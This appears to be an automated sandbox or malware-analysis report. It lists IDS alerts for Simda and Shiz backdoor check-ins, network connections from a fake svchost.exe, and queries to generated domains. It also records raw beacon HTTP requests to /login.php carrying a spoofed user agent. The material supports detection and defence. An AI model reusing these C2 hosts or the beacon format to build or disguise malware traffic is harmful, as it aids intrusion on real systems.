Source: Network traffic	Suricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.4:56388 -> 208.100.26.245:80
Source: Network traffic	Suricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.4:64276 -> 18.208.156.248:80
Source: Network traffic	Suricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.4:56396 -> 91.195.240.19:80
Source: Network traffic	Suricata IDS: 2803437 - Severity 1 - ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin : 192.168.2.4:56399 -> 154.212.231.82:80
Source: Network traffic	Suricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.4:56399 -> 154.212.231.82:80
Source: Network traffic	Suricata IDS: 2803437 - Severity 1 - ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin : 192.168.2.4:50027 -> 52.34.198.229:80
Source: Network traffic	Suricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.4:50027 -> 52.34.198.229:80
Source: Network traffic	Suricata IDS: 2803437 - Severity 1 - ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin : 192.168.2.4:64291 -> 18.208.156.248:80
Source: Network traffic	Suricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.4:64291 -> 18.208.156.248:80
Source: Network traffic	Suricata IDS: 2803437 - Severity 1 - ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin : 192.168.2.4:64302 -> 103.224.212.210:80
Source: Network traffic	Suricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.4:64302 -> 103.224.212.210:80
Source: Network traffic	Suricata IDS: 2803437 - Severity 1 - ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin : 192.168.2.4:64274 -> 44.221.84.105:80
Source: Network traffic	Suricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.4:64274 -> 44.221.84.105:80
Source: Network traffic	Suricata IDS: 2803437 - Severity 1 - ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin : 192.168.2.4:56393 -> 69.162.80.58:80
Source: Network traffic	Suricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.4:56393 -> 69.162.80.58:80
Source: Network traffic	Suricata IDS: 2803437 - Severity 1 - ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin : 192.168.2.4:64292 -> 103.150.11.230:80
Source: Network traffic	Suricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.4:64292 -> 103.150.11.230:80
Source: Network traffic	Suricata IDS: 2803437 - Severity 1 - ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin : 192.168.2.4:56387 -> 18.208.156.248:80
Source: Network traffic	Suricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.4:56387 -> 18.208.156.248:80
Source: Network traffic	Suricata IDS: 2803437 - Severity 1 - ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin : 192.168.2.4:56390 -> 44.221.84.105:80
Source: Network traffic	Suricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.4:56390 -> 44.221.84.105:80
Source: Network traffic	Suricata IDS: 2803437 - Severity 1 - ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin : 192.168.2.4:56383 -> 162.255.119.102:80
Source: Network traffic	Suricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.4:56383 -> 162.255.119.102:80
Source: Network traffic	Suricata IDS: 2803437 - Severity 1 - ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin : 192.168.2.4:64306 -> 15.197.240.20:80
Source: Network traffic	Suricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.4:64306 -> 15.197.240.20:80
Source: Network traffic	Suricata IDS: 2803437 - Severity 1 - ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin : 192.168.2.4:56394 -> 85.17.31.122:80
Source: Network traffic	Suricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.4:56394 -> 85.17.31.122:80
Source: Network traffic	Suricata IDS: 2803437 - Severity 1 - ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin : 192.168.2.4:64289 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.4:64289 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2803437 - Severity 1 - ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin : 192.168.2.4:50117 -> 72.52.179.174:80
Source: Network traffic	Suricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.4:50117 -> 72.52.179.174:80
Source: Network traffic	Suricata IDS: 2803437 - Severity 1 - ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin : 192.168.2.4:64297 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.4:64297 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2803437 - Severity 1 - ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin : 192.168.2.4:64300 -> 64.225.91.73:80
Source: Network traffic	Suricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.4:64300 -> 64.225.91.73:80
Source: Network traffic	Suricata IDS: 2021022 - Severity 1 - ET MALWARE Wapack Labs Sinkhole DNS Reply : 1.1.1.1:53 -> 192.168.2.4:53545
Source: Network traffic	Suricata IDS: 2803437 - Severity 1 - ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin : 192.168.2.4:56395 -> 172.234.222.143:80
Source: Network traffic	Suricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.4:56395 -> 172.234.222.143:80
Source: Network traffic	Suricata IDS: 2803437 - Severity 1 - ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin : 192.168.2.4:56385 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.4:56385 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2803437 - Severity 1 - ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin : 192.168.2.4:56398 -> 85.17.31.122:80
Source: Network traffic	Suricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.4:56398 -> 85.17.31.122:80
Source: Network traffic	Suricata IDS: 2803437 - Severity 1 - ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin : 192.168.2.4:56391 -> 172.234.222.143:80
Source: Network traffic	Suricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.4:56391 -> 172.234.222.143:80
Source: Network traffic	Suricata IDS: 2021022 - Severity 1 - ET MALWARE Wapack Labs Sinkhole DNS Reply : 1.1.1.1:53 -> 192.168.2.4:61952
Source: Network traffic	Suricata IDS: 2803437 - Severity 1 - ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin : 192.168.2.4:56392 -> 3.94.10.34:80
Source: Network traffic	Suricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.4:56392 -> 3.94.10.34:80
Source: Network traffic	Suricata IDS: 2803437 - Severity 1 - ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin : 192.168.2.4:56384 -> 3.64.163.50:80
Source: Network traffic	Suricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.4:56384 -> 3.64.163.50:80
Source: Network traffic	Suricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.4:49661 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.4:51114 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.4:64278 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.4:56397 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.4:64293 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.4:64296 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.4:56400 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.4:49654 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.4:64286 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.4:51121 -> 188.114.97.3:443

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\apppatch\svchost.exe	Network Connect: 64.190.63.136 80	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Network Connect: 3.94.10.34 80	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Network Connect: 15.197.240.20 80	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Domain query: lysynur.com
Source: C:\Windows\apppatch\svchost.exe	Network Connect: 172.234.222.143 80	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Network Connect: 72.52.179.174 80	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Network Connect: 154.85.183.50 80	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Network Connect: 64.225.91.73 80	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Network Connect: 69.162.80.60 80	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Network Connect: 52.34.198.229 80	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Network Connect: 5.79.71.225 80	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Domain query: gaqypiz.com
Source: C:\Windows\apppatch\svchost.exe	Network Connect: 199.191.50.83 80	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Network Connect: 13.248.169.48 80	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Network Connect: 106.15.137.66 8001	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Network Connect: 103.224.212.210 80	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Domain query: pufyjag.com
Source: C:\Windows\apppatch\svchost.exe	Network Connect: 18.208.156.248 80	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Network Connect: 208.100.26.245 80	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Domain query: galyqoh.com
Source: C:\Windows\apppatch\svchost.exe	Network Connect: 103.224.182.252 80	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Network Connect: 199.59.243.226 80	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Network Connect: 103.150.11.230 80	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Network Connect: 3.64.163.50 80	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Network Connect: 91.195.240.19 80	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Network Connect: 162.255.119.102 80	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Network Connect: 188.114.97.3 443	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Network Connect: 44.221.84.105 80	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Network Connect: 154.212.231.82 80	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Network Connect: 188.114.96.3 443	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Network Connect: 85.17.31.122 80	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Network Connect: 69.162.80.58 80	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Domain query: gacyzuh.com

Queries Google from non browser process on port 80

Source: C:\Windows\apppatch\svchost.exe	HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: qegyhig.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: C:\Windows\apppatch\svchost.exe	HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gahyqah.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: C:\Windows\apppatch\svchost.exe	HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lyvyxor.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: C:\Windows\apppatch\svchost.exe	HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: qetyfuv.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: C:\Windows\apppatch\svchost.exe	HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: puzylyp.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: C:\Windows\apppatch\svchost.exe	HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: galyqaz.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: C:\Windows\apppatch\svchost.exe	HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: vocyzit.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: C:\Windows\apppatch\svchost.exe	HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: vonypom.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: C:\Windows\apppatch\svchost.exe	HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lymyxid.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: C:\Windows\apppatch\svchost.exe	HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: vojyqem.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: C:\Windows\apppatch\svchost.exe	HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lyvyxor.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: C:\Windows\apppatch\svchost.exe	HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: puzylyp.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: C:\Windows\apppatch\svchost.exe	HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lysyfyj.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: C:\Windows\apppatch\svchost.exe	HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: www.gahyqah.com Connection: Keep-Alive Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: C:\Windows\apppatch\svchost.exe	HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: vojyqem.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: C:\Windows\apppatch\svchost.exe	HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gatyfus.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: C:\Windows\apppatch\svchost.exe	HTTP traffic: GET / HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: ww3.galyqaz.com Connection: Keep-Alive Cookie: vsid=926vr471977221402211128 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: C:\Windows\apppatch\svchost.exe	HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: qegyhig.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: C:\Windows\apppatch\svchost.exe	HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gadyniw.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: C:\Windows\apppatch\svchost.exe	HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gadyniw.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: C:\Windows\apppatch\svchost.exe	HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: pupydeq.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: C:\Windows\apppatch\svchost.exe	HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lysyvan.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: C:\Windows\apppatch\svchost.exe	HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: pupycag.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: C:\Windows\apppatch\svchost.exe	HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lyrysor.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: C:\Windows\apppatch\svchost.exe	HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lyrysor.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: C:\Windows\apppatch\svchost.exe	HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lyrysor.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: C:\Windows\apppatch\svchost.exe	HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lysyvan.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: C:\Windows\apppatch\svchost.exe	HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: pupydeq.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: C:\Windows\apppatch\svchost.exe	HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: galynuh.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: C:\Windows\apppatch\svchost.exe	HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gadyciz.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: C:\Windows\apppatch\svchost.exe	HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: vofycot.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: C:\Windows\apppatch\svchost.exe	HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lyxynyx.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: C:\Windows\apppatch\svchost.exe	HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: qegyval.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: C:\Windows\apppatch\svchost.exe	HTTP traffic: GET /login.php?sub1=20240824-0247-3846-ad61-5b1f45bc95f4 HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: ww16.vofycot.com Connection: Keep-Alive Cookie: __tad=1724431658.5743798 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: C:\Windows\apppatch\svchost.exe	HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: qegyval.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: C:\Windows\apppatch\svchost.exe	HTTP traffic: GET /login.php?subid1=20240824-0247-3858-b174-cdc5f33d229c HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: ww25.lyxynyx.com Connection: Keep-Alive Cookie: __tad=1724431658.5024510 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: C:\Windows\apppatch\svchost.exe	HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: qetyhyg.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: C:\Windows\apppatch\svchost.exe	HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gatyhub.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
